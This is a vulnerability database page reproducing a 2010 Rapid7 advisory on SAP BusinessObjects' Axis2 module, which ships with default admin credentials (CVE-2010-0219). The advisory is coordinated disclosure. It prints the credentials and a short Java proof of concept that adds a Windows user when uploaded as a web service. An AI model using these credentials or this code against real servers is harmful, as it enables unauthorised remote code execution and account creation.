Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24976
HistoryOct 24, 2010 - 12:00 a.m.

R7-0037: SAP BusinessObjects Axis2 Default Admin Password

2010-10-2400:00:00
vulners.com
35
JSON

R7-0037: SAP BusinessObjects Axis2 Default Admin Password
October 13th, 2010

Description:

The SAP BusinessObjects product contains a module (dswsbobje.war) which
deploys Axis2 with an administrator account which is configured with a
static password. As a result, anyone with access to the Axis2 port can
gain full access to the machine via arbitrary remote code execution.
This requires the attacker to upload a malicious web service and to
restart the instance of Tomcat. This issue may apply to other products
and vendors that embed the Axis2 component. The username is "admin" and
the password is "axis2", this is also the default for standalone Axis2
installations.

Impact:

An attacker can execute arbitrary code by creating a malicious web
service (jar). The attacker can log in to the Axis2 component with the
default admin account, upload the malicious web service, and upon
restart the malicious code will be executed.

Proof of Concept Code:

Create a webservice (jar) which contains malicious code. Login to Axis2
and upload the web service. Restart Tomcat and the malicious code will
execute once Axis2 is loaded.

package org.apache.axis2.axis2userguide; import java.io.IOException;
public class AddUser {
public AddUser() {
Process process;
try {
process = Runtime.getRuntime().exec("net user foo bar /add");
}
catch(IOException ioexception) {
ioexception.printStackTrace();
}
}
public void main() {
return;
}
}

CVE: CVE-2010-0219

Vendor Response:

A fix has been provided on the SAP customer support site: SAP Security
Note 1432881. Please note that this site requires authentication.

References:

http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
http://www.kb.cert.org/vuls/id/989719

Disclosure Timeline:

2010-08-12 - Vulnerability reported to the vendor via email
2010-08-12 - Vendor confirmed the vulnerability
2010-09-02 - Vulnerability reported to CERT
2010-10-13 - Coordinated public release of advisory

Credit:

This vulnerability was reported by Joshua Abraham and Will Vandevanter.

About Rapid7 Security:

Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.

Our vulnerability disclosure policy is available online at:

http://www.rapid7.com/disclosure.jsp

Related

saint 8
nessus 1
cert 1
packetstorm 3
openvas 4
checkpoint_advisories 1
securityvulns 1
prion 1
veracode 1
cve 1
nuclei 1
saint
saint
HP Universal CMDB Server Axis2 default password
2011-02-22 00:00:00
HP Universal CMDB Server Axis2 default password
2011-02-22 00:00:00
HP Universal CMDB Server Axis2 default password
2011-02-22 00:00:00
nessus
nessus
Apache Axis2 Default Credentials
2010-05-27 00:00:00
cert
cert
SAP BusinessObjects Axis2 Default Admin Password
2010-10-13 00:00:00
packetstorm
packetstorm
Axis2 Upload Exec (via REST)
2010-12-01 00:00:00
Rapid7 Security Advisory 37
2010-10-15 00:00:00
Axis2 / SAP BusinessObjects dswsbobje Upload Exec
2010-11-16 00:00:00
openvas
openvas
Apache Axis2 axis2-admin default credentials
2015-03-18 00:00:00
Apache Axis Detection (HTTP)
2016-04-06 00:00:00
Apache Axis2 Detection (HTTP)
2010-09-20 00:00:00
checkpoint_advisories
checkpoint_advisories
CA ARCserve D2D Axis2 Default Credentials Remote Code Execution (CVE-2010-0219)
2011-02-08 00:00:00
securityvulns
securityvulns
SAP BusinessObjects default password
2010-10-24 00:00:00
prion
prion
Default credentials
2010-10-18 17:00:00
veracode
veracode
Arbitrary Code Execution
2019-03-25 08:40:43
cve
cve
CVE-2010-0219
2010-10-18 17:00:00
nuclei
nuclei
Apache Axis2 Default Login
2021-02-26 20:03:32
JSON
Related for SECURITYVULNS:DOC:24976
saint8nessus1cert1packetstorm3openvas4checkpoint_advisories1securityvulns1prion1veracode1cve1nuclei1